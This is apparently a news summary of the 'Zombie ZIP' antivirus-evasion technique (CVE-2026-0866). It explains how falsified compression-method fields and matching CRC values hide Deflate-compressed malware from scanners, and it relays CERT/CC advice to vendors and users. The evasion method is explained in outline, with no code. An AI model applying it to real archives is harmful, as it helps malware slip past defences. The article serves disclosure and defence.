A newly developed method called "Zombie ZIP" allows malicious payloads to remain undetected by manipulating compressed file headers to deceive security tools. The technique works by altering ZIP headers to falsely indicate that compressed data is stored in uncompressed format, causing antivirus and endpoint detection systems to scan garbled content rather than the actual malicious code. Standard extraction utilities like WinRAR and 7-Zip encounter errors or corrupted data when attempting to open these specially crafted archives.
Security researcher Chris Aziz demonstrated that this approach successfully evaded detection by 50 out of 51 antivirus engines on VirusTotal. The deception relies on security products trusting the ZIP method field which claims Method=0 for stored data, while the archive actually contains Deflate-compressed payloads. A purpose-built loader ignoring the header deception can properly decompress and recover the hidden malware.
The proof-of-concept published on GitHub requires setting CRC values to match uncompressed payload checksums, causing legitimate extraction tools to fail while malicious loaders succeed. CERT/CC issued a warning about CVE-2026-0866, noting similarities to a two-decade-old vulnerability affecting early ESET products. The agency recommends that security vendors validate compression methods against actual data and implement inconsistency detection mechanisms. Users are advised to treat archive files from unknown sources with extreme caution and immediately delete any that produce "unsupported method" errors during extraction attempts.
Read more...